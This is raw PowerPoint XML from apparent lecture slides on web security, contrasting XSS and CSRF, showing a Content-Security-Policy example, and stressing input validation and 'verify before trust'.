              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;meta http-equiv="Content-Security-Policy" content="default-  src 'self'; img-src https://*; child-src 'none';"&gt;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4ED1BB0-6056-7A4F-A0D8-F50A0D2FF3EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1803402" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-325" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>vs.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="270" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-235" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B628EDB6-C4C5-F448-B0A8-91A02BBEECD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2263775"/>
            <a:ext cx="150812" cy="319088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="30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F399E1B2-BF1B-1742-B462-6E12438E912E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="2203450"/>
            <a:ext cx="5613400" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Do not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>confuse </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>two:</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E000F0C-EF42-4C4A-ACD2-5B90BD3279EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3059113"/>
            <a:ext cx="150812" cy="319087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="305" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181254" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFCD23C2-C906-7542-871E-ECEA5541C749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1092200" y="3025775"/>
            <a:ext cx="815975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3100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS exploits the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a client browser has in data sent  from the legitimate website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{732CF272-C3CF-F040-BA16-76ADBB31CFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4003675"/>
            <a:ext cx="152400" cy="319088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="305" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181256" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C09C211-3B42-C947-8F36-3791AA16DD68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435100" y="3940175"/>
            <a:ext cx="711517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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So the attacker tries to control what the website  sends to the client browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44996E15-860D-604B-9157-78935176EBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="5202238"/>
            <a:ext cx="150812" cy="319087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="305" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181258" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC1AAF8-4E2B-5C49-BE3C-095E0252171C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1092200" y="5133975"/>
            <a:ext cx="75120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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF exploits the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a legitimate website has in  data sent from the client browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A7D38E9-131C-9C4D-BADE-6DC3EAADB02F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6146800"/>
            <a:ext cx="152400" cy="319088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="305" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181260" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4B3199-14F4-C54D-AF3B-501029E0117C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435100" y="6086475"/>
            <a:ext cx="675957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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So the attacker tries to control what the client  browser sends to the website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63314F9-DE2B-094C-884E-008DB767C3F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="898525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="63392" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15847" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5300" spc="65" dirty="0"/>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="30" dirty="0"/>
              <a:t>validation, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="155" dirty="0"/>
              <a:t>ad</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="5" dirty="0"/>
              <a:t>infinitum</a:t>
            </a:r>
            <a:endParaRPr sz="5300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70BF52EE-BD22-5848-AB20-C196EC3E274D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="32750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82276" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4B002E-1806-434B-8C03-1935A00328FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="3216275"/>
            <a:ext cx="3621088"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174"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ts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Many other web-  based bugs, ultimately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trusting  external input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(too  much)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182277" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2502DBB-43A1-F44A-A441-96BDCDF4DC0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5232400" y="2159000"/>
            <a:ext cx="4279900" cy="47117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6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99CF4AE5-5FA2-8D4D-A386-BEA81DBB5073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6032500" y="7302500"/>
            <a:ext cx="2901950" cy="184150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.jantoo.com/cartoon/08336711</a:t>
            </a:r>
            <a:endParaRPr sz="120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61C18FA-CEDD-8240-9FCB-A70D5DB06D6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="863600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="76068" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28526" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-70" dirty="0"/>
              <a:t>Takeaways: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t>Verify </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="40" dirty="0"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="114" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0"/>
              <a:t>trust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2A7EE0-AB66-5744-898D-8862D8171AC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="23225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CEE3CF73-42DF-4A44-94AD-2BD57927D703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="2266950"/>
            <a:ext cx="7664450" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Improperly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>validated input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>causes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FE3B93A-446B-4F40-BB9E-1B3706425B85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3157538"/>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3A89A229-68CE-7A40-A70C-E097C70FF11A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="3105150"/>
            <a:ext cx="7670800" cy="4159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Common </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to solutions: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>check </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sanitize </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F4869BA-83C2-7645-A973-2F221E225826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="372745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9E25DD83-AC05-7445-95C0-46276C728E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4297363"/>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9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A16A5B2-56A7-BD48-B5A9-E208B20ACD59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="3676650"/>
            <a:ext cx="6870700" cy="1003300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
